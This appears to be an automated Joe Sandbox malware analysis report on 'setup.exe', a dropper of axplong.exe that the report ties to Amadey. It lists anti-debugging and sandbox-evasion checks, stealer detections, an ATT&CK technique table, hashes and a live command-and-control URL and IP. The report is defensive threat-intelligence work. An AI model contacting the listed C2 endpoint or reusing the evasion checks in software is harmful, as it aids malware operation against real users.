                    Source: setup.exe, 00000000.00000002.2129130568.0000000000389000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2157885886.00000000006F9000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2166485787.00000000006F9000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\setup.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\setup.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_04F00130 Start: 04F001A2 End: 04F001854_2_04F00130
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_04F600B8 rdtsc 0_2_04F600B8
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_0053645B mov eax, dword ptr fs:[00000030h]4_2_0053645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_0053A1C2 mov eax, dword ptr fs:[00000030h]4_2_0053A1C2
                    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: PProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_0051D312 cpuid 4_2_0051D312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_0051CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,4_2_0051CB1A

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 3.2.axplong.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.axplong.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.setup.exe.190000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.axplong.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000003.2188818191.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.2126010864.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2128912313.0000000000191000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2166411163.0000000000501000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2157568519.0000000000501000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.2116812942.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2088563271.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    12
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    251
                    Virtualization/Sandbox Evasion
                    LSASS Memory641
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    12
                    Process Injection
                    Security Account Manager2
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS251
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    setup.exe100%AviraTR/Crypt.TPM.Gen
                    setup.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://185.215.113.16/Jo89Ku7d/index.phpHead100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpd100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php_100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phph100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpIG100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php$100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=E?100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php-100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php#100%Avira URL Cloudphishing
                    http://185.215.10%Avira URL Cloudsafe
                    http://185.215.113.16/Jo89Ku7d/index.phpW100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpX100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpT100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpP100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedi100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpS100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpeGk100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.phpcoded100%Avira URL Cloudphishing
                    http://185.20%Avira URL Cloudsafe
                    http://185.215.113.16/Jo89Ku7d/index.phpded100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php8100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php3100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php7100%Avira URL Cloudphishing
                    http://185.215.113.16/Jo89Ku7d/index.php6100%Avira URL Cloudphishing
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    15.164.165.52.in-addr.arpa
                    unknown
                    unknownfalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://185.215.113.16/Jo89Ku7d/index.phptrue
                      • Avira URL Cloud: phishing
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.215.113.16/Jo89Ku7d/index.php-axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpHeadaxplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpIGaxplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Joaxplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phphaxplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.php$axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpdaxplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.php#axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.php_axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=E?axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.1axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpXaxplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpWaxplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpncodediaxplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpTaxplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpSaxplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpeGkaxplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpPaxplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpcodedaxplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.16/Jo89Ku7d/index.phpHaxplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://185.2axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpdedaxplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.php8axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.php7axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpwaxplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://185.215.113.16/Jo89Ku7d/index.php6axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://185.215.113.16/Jo89Ku7d/index.php3axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://185.215.113.16/Jo89Ku7d/index.phpsaxplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://185.215.113.16/Jo89Ku7d/index.phppaxplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.16
                              unknownPortugal
                              206894WHOLESALECONNECTIONSNLtrue
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1483209
                              Start date and time:2024-07-26 20:58:04 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 4s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:setup.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@5/3@1/1
                              EGA Information:
                              • Successful, ratio: 25%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target axplong.exe, PID 6204 because there are no executed function
                              • Execution Graph export aborted for target axplong.exe, PID 6636 because there are no executed function
                              • Execution Graph export aborted for target setup.exe, PID 4200 because it is empty
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: setup.exe
                              TimeTypeDescription
                              14:59:01API Interceptor3256185x Sleep call for process: axplong.exe modified
                              20:58:54Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.16setup.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                              • 185.215.113.16/Jo89Ku7d/index.php
                              file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                              • 185.215.113.16/Jo89Ku7d/index.php
                              file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                              • 185.215.113.16/Jo89Ku7d/index.php
                              6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                              • 185.215.113.16/Jo89Ku7d/index.php
                              EXyAlLKIck.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.16/Jo89Ku7d/index.php
                              IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                              • 185.215.113.16/Jo89Ku7d/index.php
                              file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                              • 185.215.113.16/Jo89Ku7d/index.php
                              JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                              • 185.215.113.16/Jo89Ku7d/index.php
                              PE1dBCFKZv.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.16/Jo89Ku7d/index.php
                              random.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.16/Jo89Ku7d/index.php
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLsetup.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                              • 185.215.113.16
                              setup.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.19
                              file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousRedLineBrowse
                              • 185.215.113.9
                              file.exeGet hashmaliciousRedLineBrowse
                              • 185.215.113.9
                              6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                              • 185.215.113.16
                              SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.19
                              EXyAlLKIck.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.16
                              IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                              • 185.215.113.16
                              No context
                              No context
                              Process:C:\Users\user\Desktop\setup.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):1933312
                              Entropy (8bit):7.952210931809818
                              Encrypted:false
                              SSDEEP:24576:oIvyMO1yy9rBJGj1vReUIRT8e+SMT5OClJ4xMwp/isDudUf+sDDLTjWJMKMy2xzQ:oQq98Id7MdOCluSo/xDu8pDDaMRCJ1l
                              MD5:2A846C38FB95E0103773296F7E7794EB
                              SHA1:57957DC05264A8580D1494D0152018BE250D22A3
                              SHA-256:5F88CEDCC10D3ED6D330E1223602452CB5FE1210E8D245A4C0A7FF1991A23373
                              SHA-512:D35EDBC153D607857A32C93A28E26C9672DE679DE94AEA1C032B6A45EC402321F8BECA3679073F50CC1AA8DA94D5781424A7733DAB3BAFB65CE7E14A1D52AED2
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................L...........@...........................L...........@.................................W...k...........................x.L.............................(.L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...aosdyjib.p...02..d..................@...ttauocqi......L......X..............@....taggant.0....L.."...^..............@...........................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\setup.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Reputation:high, very likely benign file
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\user\Desktop\setup.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):304
                              Entropy (8bit):3.4286524963479907
                              Encrypted:false
                              SSDEEP:6:bz9/XlXUEZ+lX1lOJUPelkDdtE9+AQy0l1Xyldt0:1f1Q1lOmeeDs9+nV1Cldt0
                              MD5:BA1A5FC89388CF71223DDB59D45A414F
                              SHA1:CB48D849C6098A6DC048C4836270CB0283688ED1
                              SHA-256:A74520071DB1450A99ED134B7E63871DF5337116B296AA788F4E97763572667A
                              SHA-512:A86D8112502989243E58F7388DC13296109A38BB6634579AB685E2C608CEF81C3AE4E6BCC139C52F54D1719E2ABCF7E7845034DAC57C18B93577D86747551C15
                              Malicious:false
                              Reputation:low
                              Preview:....VPC....H.<.....F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................;.@3P.........................
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.952210931809818
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:setup.exe
                              File size:1'933'312 bytes
                              MD5:2a846c38fb95e0103773296f7e7794eb
                              SHA1:57957dc05264a8580d1494d0152018be250d22a3
                              SHA256:5f88cedcc10d3ed6d330e1223602452cb5fe1210e8d245a4c0a7ff1991a23373
                              SHA512:d35edbc153d607857a32c93a28e26c9672de679de94aea1c032b6a45ec402321f8beca3679073f50cc1aa8da94d5781424a7733dab3bafb65ce7e14a1d52aed2
                              SSDEEP:24576:oIvyMO1yy9rBJGj1vReUIRT8e+SMT5OClJ4xMwp/isDudUf+sDDLTjWJMKMy2xzQ:oQq98Id7MdOCluSo/xDu8pDDaMRCJ1l
                              TLSH:749533F42C68B487D7EC2AF92C0245722A3865495CD2B913FD0E106F74E75AB26EAC5C
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0x8cb000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007F47D881B5BAh
                              divps xmm3, dqword ptr [00000000h]
                              add cl, ch
                              add byte ptr [eax], ah
                              add byte ptr [eax], al
                              add byte ptr [eax+eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              and al, 00h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
